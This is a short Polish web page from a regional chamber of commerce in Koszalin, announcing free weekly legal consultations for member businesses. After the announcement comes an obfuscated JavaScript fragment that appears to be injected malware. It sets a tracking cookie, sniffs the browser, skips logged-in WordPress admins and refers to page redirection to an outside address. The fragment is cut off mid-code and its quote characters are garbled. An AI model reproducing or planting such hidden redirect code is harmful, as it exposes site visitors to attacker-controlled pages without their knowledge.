Bezpłatne porady prawne dla przedsiębiorców zrzeszonych w Izbie! | Północna Izba Gospodarcza w Koszalinie
Radca prawny Sebastian Catewicz oferuje Państwu bezpłatną pomoc prawną w zakresie prawa gospodarczego, cywilnego i karnego oraz prawa pracy, także w sprawach nie związanych bezpośrednio z przedmiotem Państwa działalności. W ramach pomocy możliwe jest spotkanie z adwokatem, analiza dokumentów lub rozmowa telefoniczna na interesujący Państwa temat.
 
Konsultacje odbywają się we wtorki od 16:30, po uprzednim umówieniu telefonicznym wizyty pod numerem tel. 537-184-630 w Biurze Północnej Izby Gospodarczej.
Zapraszamy!

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m